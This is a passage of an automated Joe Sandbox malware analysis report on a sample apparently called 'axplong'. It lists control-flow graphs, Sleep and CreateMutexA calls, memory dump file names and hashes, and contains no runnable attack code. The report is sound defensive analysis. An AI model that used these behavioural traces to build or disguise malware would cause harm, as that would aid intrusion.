                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.269506314681.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506265175.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506314681.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506489899.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506548392.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506595722.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506897719.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506931878.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506972578.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506972578.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507055442.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507112682.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507181115.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507251558.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507321043.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507365984.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507425064.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507485005.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507526368.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507568986.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507621393.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507662099.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507701418.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507744699.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507804884.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507847964.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507894474.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507933685.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507973976.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508015947.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508075524.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508125838.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508174190.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508225525.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508275112.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508331311.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508404433.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508458182.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508516977.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508579985.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508631771.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508685195.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508685195.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508879206.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508969929.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509057073.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509143176.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509232334.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509332303.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_630000_axplong.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID: $2i
                                                                                                                                                                                                        • API String ID: 1464230837-421247651
                                                                                                                                                                                                        • Opcode ID: fedfdc4d852de5993f43567436f55e5f8926eecb92ecde453bf1a8e6884c7520
                                                                                                                                                                                                        • Instruction ID: 53ff712ebfb8498471aafbb5fa0bde9bda7426d5cc5e9713cc7f8dcfe71f7cf4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: fedfdc4d852de5993f43567436f55e5f8926eecb92ecde453bf1a8e6884c7520
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 82316831A04200CBEB08DBBCDC847ADBB639F86314F20826CE554EB7D5D77599819BA1

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 56 639fa9-639fc9 60 639ff7-63a013 56->60 61 639fcb-639fd7 56->61 64 63a041-63a060 60->64 65 63a015-63a021 60->65 62 639fd9-639fe7 61->62 63 639fed-639ff4 call 64d593 61->63 62->63 66 63a860 62->66 63->60 70 63a062-63a06e 64->70 71 63a08e-63a846 call 647f30 64->71 68 63a023-63a031 65->68 69 63a037-63a03e call 64d593 65->69 75 63a883-63a8c4 Sleep CreateMutexA 66->75 76 63a860 call 666b9a 66->76 68->66 68->69 69->64 72 63a070-63a07e 70->72 73 63a084-63a08b call 64d593 70->73 72->66 72->73 73->71 86 63a8d7-63a8d8 75->86 87 63a8c6-63a8c8 75->87 76->75 87->86 88 63a8ca-63a8d5 87->88 88->86
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 0063A893
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.269506314681.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506265175.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506314681.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506489899.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506548392.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506595722.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506897719.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506931878.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506972578.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506972578.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507055442.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507112682.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507181115.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507251558.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507321043.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507365984.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507425064.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507485005.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507526368.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507568986.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507621393.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507662099.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507701418.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507744699.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507804884.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507847964.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507894474.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507933685.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507973976.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508015947.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508075524.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508125838.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508174190.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508225525.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508275112.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508331311.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508404433.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508458182.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508516977.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508579985.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508631771.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508685195.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508685195.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508879206.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508969929.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509057073.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509143176.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509232334.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509332303.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_630000_axplong.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID: $2i
                                                                                                                                                                                                        • API String ID: 1464230837-421247651
                                                                                                                                                                                                        • Opcode ID: 7820a96e8f1bd5bc83491674421410fe59d8e69b66a0a6e2190d62a823272d4c
                                                                                                                                                                                                        • Instruction ID: 4a11cc715026711b78f6d59fb562e3a3e94ed763a8638ab2d31059282209d90e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7820a96e8f1bd5bc83491674421410fe59d8e69b66a0a6e2190d62a823272d4c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A9314831B10200CBEB0C9BBCDD8476DB7739F85318F20826CE1509B7D5C775998197A6

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 90 63a0de-63a0fe 94 63a100-63a10c 90->94 95 63a12c-63a148 90->95 96 63a122-63a129 call 64d593 94->96 97 63a10e-63a11c 94->97 98 63a176-63a195 95->98 99 63a14a-63a156 95->99 96->95 97->96 100 63a865-63a8c4 call 666b9a Sleep CreateMutexA 97->100 104 63a1c3-63a846 call 647f30 98->104 105 63a197-63a1a3 98->105 102 63a158-63a166 99->102 103 63a16c-63a173 call 64d593 99->103 120 63a8d7-63a8d8 100->120 121 63a8c6-63a8c8 100->121 102->100 102->103 103->98 106 63a1a5-63a1b3 105->106 107 63a1b9-63a1c0 call 64d593 105->107 106->100 106->107 107->104 121->120 122 63a8ca-63a8d5 121->122 122->120
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 0063A893
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.269506314681.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506265175.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506314681.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506489899.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506548392.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506595722.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506897719.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506931878.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506972578.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506972578.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507055442.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507112682.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507181115.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507251558.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507321043.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507365984.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507425064.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507485005.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507526368.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507568986.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507621393.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507662099.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507701418.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507744699.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507804884.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507847964.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507894474.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507933685.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507973976.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508015947.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508075524.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508125838.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508174190.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508225525.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508275112.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508331311.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508404433.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508458182.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508516977.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508579985.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508631771.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508685195.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508685195.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508879206.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508969929.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509057073.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509143176.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509232334.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509332303.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_630000_axplong.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID: $2i
                                                                                                                                                                                                        • API String ID: 1464230837-421247651
                                                                                                                                                                                                        • Opcode ID: 8ad464337f6adf213c679cb25aef7397267703a30b613fbaf16748a26287d906
                                                                                                                                                                                                        • Instruction ID: bd5261c8b37f3516f360a4c6339c86d396ee6c0043b2cc46bb4e4523e7f3bc46
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8ad464337f6adf213c679cb25aef7397267703a30b613fbaf16748a26287d906
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 43315931A14200CBFB0CDBBCDD887ADBBA39F86314F20426DE150AB7D5D7359981A792

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 124 63a348-63a368 128 63a396-63a3b2 124->128 129 63a36a-63a376 124->129 130 63a3e0-63a3ff 128->130 131 63a3b4-63a3c0 128->131 132 63a378-63a386 129->132 133 63a38c-63a393 call 64d593 129->133 138 63a401-63a40d 130->138 139 63a42d-63a846 call 647f30 130->139 136 63a3c2-63a3d0 131->136 137 63a3d6-63a3dd call 64d593 131->137 132->133 134 63a86f-63a87e call 666b9a * 3 132->134 133->128 157 63a883-63a8c4 Sleep CreateMutexA 134->157 158 63a87e call 666b9a 134->158 136->134 136->137 137->130 144 63a423-63a42a call 64d593 138->144 145 63a40f-63a41d 138->145 144->139 145->134 145->144 160 63a8d7-63a8d8 157->160 161 63a8c6-63a8c8 157->161 158->157 161->160 162 63a8ca-63a8d5 161->162 162->160
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 0063A893
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.269506314681.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506265175.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506314681.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506489899.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506548392.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506595722.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506897719.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506931878.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506972578.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506972578.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507055442.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507112682.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507181115.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507251558.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507321043.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507365984.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507425064.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507485005.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507526368.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507568986.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507621393.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507662099.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507701418.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507744699.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507804884.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507847964.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507894474.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507933685.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507973976.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508015947.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508075524.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
